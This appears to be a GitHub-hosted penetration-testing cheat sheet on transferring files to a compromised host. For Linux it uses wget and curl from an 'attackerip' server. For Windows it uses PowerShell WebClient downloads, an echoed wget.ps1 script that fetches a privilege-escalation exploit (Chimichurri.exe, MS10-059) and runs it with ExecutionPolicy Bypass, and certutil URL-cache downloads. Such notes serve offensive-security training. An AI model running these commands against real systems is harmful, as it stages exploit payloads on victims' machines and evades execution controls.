-
Notifications
You must be signed in to change notification settings - Fork 51
/
4 - File Transfer
37 lines (23 loc) · 1.13 KB
/
4 - File Transfer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
LINUX
#Firstly, we create a web server on our own machine;
python -m SimpleHTTPServer <port>
#Then we get our file over the webserver;
wget http://attackerip/file
curl http://attackerip/file > file
------------------------------------------------------------------------------------------------------------------------------
WINDOWS
#Firstly, we create a web server on our own machine;
python -m SimpleHTTPServer <port>
OPTION 1:
#Then we get our file over the webserver;
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://attackerip/WindowsEnum/WindowsEnum.ps1','C:\Users\Public\Downloads\WindowsEnum.ps1')
OPTION 2:
#We run the following commands on the victim system, respectively;
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://attackerip:port/Chimichurri.exe" >>wget.ps1
echo $file = "ms10-059-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
OPTION 3:
#Then we get our file over the webserver;
certutil.exe -urlcache -split -f "http://attackerip/file.exe"